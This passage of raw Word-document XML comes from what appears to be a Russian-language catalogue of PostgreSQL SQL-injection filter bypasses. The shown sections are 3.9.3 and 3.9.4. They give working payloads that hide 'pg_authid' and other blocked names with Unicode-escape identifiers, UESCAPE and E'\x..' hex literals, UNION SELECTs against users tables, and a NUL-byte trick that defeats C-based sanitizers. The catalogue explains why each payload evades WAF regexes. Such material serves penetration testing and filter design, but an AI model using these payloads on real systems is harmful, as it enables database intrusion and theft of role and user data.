          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UESCAPE '!'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, использует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escape вместо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Sanitizer-у нечего удалять — backslash в payload отсутствует.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload C — U&amp;"identifier" для имён таблиц/колонок (обход idspecific keyword-фильтра)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Применимо, когда фильтр блокирует имя таблицы/колонки как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">слово в идентификаторе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\bpg_authid\b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Quoted-identifier-форма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обходит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-границу слова, но содержит подстроку.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строит идентификатор из codepoint-ов:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (в DO-контексте, потому что напрямую </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM U&amp;"..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> тоже работает, но reader-friendly через PL/pgSQL):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1; SELECT rolname FROM U&amp;"\0070\0067\005F\0061\0075\0074\0068\0069\0064" --</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FROM articles LIMIT 1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT rolname FROM U&amp;"\0070\0067\005F\0061\0075\0074\0068\0069\0064" --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">U&amp;"\0070\0067..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> парсится как идентификатор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(с двойными кавычками, регистрозависимый). PG ищет таблицу с этим именем — находит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_catalog.pg_authid</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search_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Sanitizer/WAF не нашли подстроки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в payload-тексте.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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 менее распространённый, чем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Идентификаторы в PG ограничены 63 байтами по умолчанию (NAMEDATALEN); для длинных имён в payload — приходится укорачивать или поднимать NAMEDATALEN (последнее — только пересборка PG).</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 лексический префикс. Парсер PG распознаёт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как маркер Unicode-escape перед строковым литералом и применяет escape-интерпретацию. WAF-regex, ориентированный на конкретные подстроки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их в payload не видит.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отличие от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decode()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — нет вызова функции. Sanitizer, ищущий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\w+\s*\(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не находит ничего; sanitizer, считающий «слишком много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тоже не срабатывает (вся строка — один литерал без конкатенации).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UESCAPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Payload B) обходит фильтр на backslash — escape-символ переопределяется одним токеном </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UESCAPE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(Payload C) — лексическая форма идентификатора, обходит word-boundary regex.</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Unicode-escape — часть SQL:2003 стандарта, реализована в PG с 9.0 (документация: §4.1.2.3 в Lexical Structure).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Синтаксис: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 standard string literal с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\NNNN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (4 hex для BMP) или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\+NNNNNN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (6 hex для supplementary planes).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Опциональный модификатор </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UESCAPE '&lt;char&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> следует сразу после литерала. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;char&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — один не-hex, не-</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символ.</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 quoted-identifier с Unicode-escape, регистрозависимый (как обычный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-идентификатор).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Поведение зависит от GUC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">standard_conforming_strings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: дефолт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (с PG 9.1) —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работает; </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(legacy) — backslash-escape в обычных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-литералах включён, и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всё равно работает по SQL-стандарту, потому что префикс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явно сигнализирует Unicode-форму.</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9.0 – 17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (все поддерживаемые). Unicode-escape стабилен с 9.0.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везде идентично self-hosted. Это лексическая фича парсера, на неё не влияют провайдер-специфичные ограничения.</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3.9.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — dollar-quoting; ортогонален Unicode-escape. Часто комбинируются, когда нужно избежать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снаружи (3.9.1) и в то же время скрыть содержимое (3.9.3).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-конкатенация. Семантически близка, но Unicode-escape компактнее и не использует function call. Различаются по тому, какой класс sanitizer обходят.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3.9.5</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convert_from(decode(...))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — ещё компактнее, но использует function call. Выбор между 3.9.3 и 3.9.5 — по тому, что фильтр разрешает (escape-синтаксис или функции).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3.9.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — escape strings </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">E'\x27'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Близкий синтаксис, другая лексика (E-prefix, hex/octal escape).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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Identifier injection в plpgsql.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 альтернативная форма quoted-identifier, к которой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устойчив (не падает, корректно эскейпит), но whitelist по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIKE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-pattern на имена — может пропустить.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\bU&amp;['"]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Unicode-escape префикс)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3.9 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">summary-3.9.md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Unicode String Constants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Quoted Identifiers and Unicode Escapes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standard_conforming_strings GUC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SQL:2003 standard § 5.3 — Unicode delimiter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (общий контекст; полный стандарт за пейволлом)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Unicode escape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Unicode escape bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.9.4 Escape strings E'\x27' (hex/octal byte literals)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код — см. 3.9.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что блокирует фильтр.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Близкий приём к 3.9.3 (Unicode-escape), но другой синтаксис и другой класс обходов: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\b(dblink|pg_read|pg_authid|...)\w*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — подстрока имени функции/каталога: hex/octal-byte literals скрывают её ещё компактнее (2 hex-цифры на байт против 4 в Unicode-escape).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C-string sanitizer (NUL-truncation)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — главный собственный класс E-strings. Если sanitizer написан на C или вызывает C-библиотеку (libxml2, OpenSSL escape, и т.п.), его строковая обработка обрывается на первом NUL-байте. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">E'admin\x00 || dangerous payload'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — sanitizer видит только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PG читает всю строку, потому что PG-строки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не C-strings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: NUL внутри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хранится как обычный байт.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Альтернативный escape-формат, когда фильтр заточен на конкретную форму</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — фильтр блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\xNN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, но пропускает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\NNN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (octal) или наоборот; E-strings допускают оба синтаксиса в одной строке.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Также E-strings — единственный синтаксис в PG, который позволяет вставить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">управляющие символы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в литерал напрямую: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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это особенно полезно в связке с 3.12.2 (newline в комментарии) и 3.12.3 (CVE-2025-8715, newline в идентификаторе).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — hex-byte literals для содержимого</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст — фильтр блокирует подстроку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в payload:</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0, name, current_database() FROM (SELECT rolname AS name FROM E'\x70\x67\x5F\x61\x75\x74\x68\x69\x64'::regclass::text::regclass) t WHERE 1=1 --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Это компактнее, чем 3.9.3, но в данном конкретном случае каст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через text-литерал имени работает только при специальном обращении —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лучше через прямой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(см. 3.9.2 Payload B). Более чистый Payload A для E-strings:</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 WHERE email = E'\x61\x64\x6D\x69\x6E\x40\x63\x6F\x2E\x63\x6F\x6D' --</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'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT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FROM users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
